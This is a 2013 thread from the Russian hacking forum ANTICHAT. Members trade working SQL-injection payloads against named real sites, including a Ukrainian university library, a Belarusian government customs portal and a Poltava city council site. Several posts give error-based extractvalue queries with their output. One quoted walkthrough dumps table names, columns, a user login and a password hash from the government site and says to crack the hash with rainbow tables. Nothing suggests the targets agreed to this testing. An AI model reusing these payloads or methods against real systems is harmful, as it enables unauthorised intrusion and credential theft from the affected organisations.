ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.01.2013, 00:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
795
Репутация:
0
|
|
Сообщение от mironich
mironich said:
ProFiLeR
, нет.
Жаль, значит придется ждать, когда перелистывание страниц сделают и SQLinj попробовать.
Я думал, что мой способ сработает, так как PHP интерпретируемый язык, но оказалось, что нет (не сработает).
|
|
|
|
30.01.2013, 00:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56
и дальше идет листинг больщого Select Запроса.
первый раз вообще вижу такую шляпу. крутится?
|
|
|
|
30.01.2013, 03:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
6667
Репутация:
0
|
|
ребят, уязвимость в поле поиска - при подставке кавычки выдаёт -
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1
как правильно составлять запрос...?
|
|
|
|
30.01.2013, 04:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от justonline
justonline said:
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56
и дальше идет листинг больщого Select Запроса.
первый раз вообще вижу такую шляпу. крутится?
Нужен весь запрос, или хотя бы урл.
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1
Попробуй так
' and 1='1
' and 1='2
И сравни результаты.
|
|
|
30.01.2013, 12:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
6667
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Попробуй так
' and 1='1
' and 1='2
И сравни результаты.
Ни то ни другое не работает... Вот урл -
http://lib.pntu.edu.ua/?module=vds*section-84
|
|
|
|
30.01.2013, 13:18
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от LelouchMe
LelouchMe said:
Ни то ни другое не работает... Вот урл -
http://lib.pntu.edu.ua/?module=vds*section-84
'and(1)='1 TRUE
'and(2)='1 FALSE
Режутся пробелы. Можно юзать только беспробельные варианты.
Ещё чуток покручу - выложу тут запросы.
UPD.
'and(extractvalue(1,concat(0x3a,(select( @@version)))))='
XPATH syntax error: ': 5.1.49-3'
'and(extractvalue(1,concat(0x3a,(select( database())))))='
XPATH syntax error: ': lib_bd'
|
|
|
|
30.01.2013, 14:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
6667
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
XPATH syntax error:
То есть дальше посимвольный перебор...?
плюсую...)+
|
|
|
|
30.01.2013, 15:12
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от LelouchMe
LelouchMe said:
То есть дальше посимвольный перебор...?
плюсую...)+
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.
|
|
|
|
30.01.2013, 15:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
6667
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.
Да, я понял, спасибо, просто в "слепых" ещё слабо разбираюсь...
Короче по такой схеме крутить я так понял:
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+limit+0,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+0,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+3,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+4,1)))--
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,login,password)+from+users1+l imit+0,1)))--
или как тут
Сообщение от M_script
M_script said:
Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue
Запрос
:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1
Результат
:
Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables
Запрос
:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where`table_name`like(0x257573657225)and(data_length>0)))))='1
Результат
:
Код:
Code:
customsnew.users
Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице
Запрос
:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_name)from(information_schema.columns)where`table_name`='users'and(ordinal_position=1)))))='1
Меняя ordinal_position от 1 до 6, получаем имена всех колонок
Результат
:
Код:
Code:
ID,login,password,name,email,comment
В таблице users всего одна запись. Получаем имя
Запрос
:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
Результат
:
Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами
Запрос 1
:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)from(users)where(id=1)))))='1
Запрос 2
:
Код:
Code:
http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(password)from(users)where(id=1)),32,1))))='1
Результат
:
Код:
Code:
79e4b4438aba2b6d8e1caf9568e73e12
Расшифровываем хэш по радужным таблицам.
Результат
:
|
|
|
|
30.01.2013, 22:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
6667
Репутация:
0
|
|
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
